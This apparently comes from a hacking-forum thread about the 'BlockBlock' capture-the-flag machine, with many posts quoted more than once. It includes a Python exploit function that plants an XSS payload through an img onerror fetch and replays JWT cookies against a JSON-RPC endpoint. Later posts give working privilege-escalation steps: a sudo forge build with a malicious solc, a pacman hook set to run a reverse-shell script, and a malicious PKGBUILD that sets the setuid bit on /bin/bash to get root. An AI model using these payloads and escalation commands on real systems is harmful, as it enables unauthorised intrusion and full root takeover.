[a44857437]

Can someone please explain how we can avoid getting this error message?

{"error":"Proxy Couldn't verify token"}

I'm trying to use the token from /api/json-rpc to run the eth_getLogs method

    def do_lol(self, line):
        """
        Exploits a target by injecting a malicious payload and collecting admin information.
        This function performs the following steps:
        1. Logs in to the application with provided credentials.
        2. Injects a malicious payload to elevate the role of a user to 'admin.'
        3. Executes a secondary payload to exfiltrate admin tokens by abusing '/api/info.'
        4. Prepares for further exploitation using '/admin' and '/api/json-rpc'.
        Parameters:
        line (str): Additional parameters for the target.
        Returns:
        None
        """
        rhost = self.params["rhost"]
        url = f'http://{rhost}'
        lhost = self.params["lhost"]

        payload = (
            "<img src=x onerror=\"fetch('/api/update_role', {method: 'POST', headers: { 'Content-Type': 'application/json'}, "
            "body: JSON.stringify({ 'username': 'grisun0', 'role': 'grisun0'})})\" />"
        )
        headers = {
            "Content-Type": "application/json"
        }
        s = requests.Session()
        print_msg(f"Logging in and sending payload to {url}")
        login_response = s.post(f'{url}/api/login', headers=headers, json={"username": "grisun0", "password": "grisun0"})
        if login_response.status_code == 200:
            print_msg("Login successful. Injecting primary payload.")
            s.cookies.set("role", "admin", domain="blockblock.htb", path="/")
            s.cookies.set(
                "token",
                "eyJhbGciOi..............PJK18ySGlcZ_16dt9-UnKeX2fnM",
                domain="blockblock.htb",
                path="/",
            )
            s.cookies.set("username", "admin", domain="blockblock.htb", path="/")
            jwt_secret = {"Authorization": "34fd1a8cb0b16.........bf2a5d3b9"}
            chat_address = "0x1234567890abcdef1234567890abcdef12345678"
            url = f"{url}/api/json-rpc"
            headers = {
                "Content-Type": "application/json",
                "token": jwt_secret["Authorization"],
            }
            payload = {
                "jsonrpc": "2.0",
                "method": f"{line}",
                "params": ["latest", False],
                "id": 1
            }
            print_msg(payload)
            response = s.post(url, headers=headers, json=payload)
            print_msg(response.json())
     
            return 

Any nudge for root ???

Yes, you need to upgrade to paul first (there's a message in this thread on how). From paul to root is via the pacman installer (chatGPT might help here)

---

Phew finally rooted, the escalation to root is rather strait forward after you get paul... just create a malicious package with a post-install action and install it

so strait forward 80 people rooted that makes sense

how to move on paul i got error ??

There's a message in this thread that tells you how, abusing the program keira can sudo...

[test888]

To escalate to paul:

Init a new project

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc

sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

[xianling88]

To escalate to paul:

Init a new project

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc

sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Something like this might help, chmod 777 "anything", so that anyone can access, good starting point usually at /var/crash or /tmp

[Art10n]

I dont undertand this box, I looking 4 a write up

[test888]

To escalate to paul:

Init a new project

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc

sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

Do you create solc as the keira user? Because if so, paul cannot access it. Something's missing here.

Something like this might help, chmod 777 "anything", so that anyone can access, good starting point usually at /var/crash or /tmp

Figured out it was this and also the payload was not correct. Thank you very much!

[fl00d777]

echo "[Trigger]" > /tmp/hooks/revshell.hook

Add Trigger Information:

Run these commands one by one:

echo "Operation = Install" >> /tmp/hooks/revshell.hook
echo "Type = Package" >> /tmp/hooks/revshell.hook
echo "Target = *" >> /tmp/hooks/revshell.hook

Add Action Information:

Run these commands one by one to add the action section:

echo "" >> /tmp/hooks/revshell.hook
echo "[Action]" >> /tmp/hooks/revshell.hook
echo "Description = Reverse shell as root" >> /tmp/hooks/revshell.hook
echo "When = PostTransaction" >> /tmp/hooks/revshell.hook
echo "Exec = /tmp/root_revshell.sh" >> /tmp/hooks/revshell.hook

Thanks but still can't get it to trigger my code. Trying to install the package to trigger the hook with this:

sudo pacman -S --noconfirm base --hookdir /tmp/hooks

I haven't been able to get it to trigger yet. What am I missing?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[ritualist]

For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p

I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.

[gfttjdb]

For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p

I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.

not working bro 

[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags

[ritualist]

For those still stuck on the last step and the lazy.
As somebody mentioned, you can use a post-install step

cd /dev/shm
echo -e "pkgname=exp\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=exp.install" > PKGBUILD
echo "post_install() { chmod 4777 /bin/bash; }" > exp.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p

I have also noticed that for keira -> paul you can skip the init step and just use build.
Put a rev shell as your payload.

not working bro 

[keira@blockblock shm]$ sudo pacman -U *.zst --noconfirm
[sudo] password for keira:
Sorry, user keira is not allowed to execute '/usr/bin/pacman -U exp-1.0-1-any.pkg.tar.zst --noconfirm' as root on blockblock.

It's for paul -> root
See my previous post for getting from keira to paul.

[gfttjdb]

To escalate to paul:

Init a new project

sudo -u paul /home/paul/.foundry/bin/forge init /dev/shm/exploit --no-git --offline

Put your payload in e.g. /dev/shm/solc

In `/dev/shm/exploit`, build with a custom solc

sudo -u paul /home/paul/.foundry/bin/forge build --use ../solc

Last step is using pacman.

anyone can provide the exploit ??

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags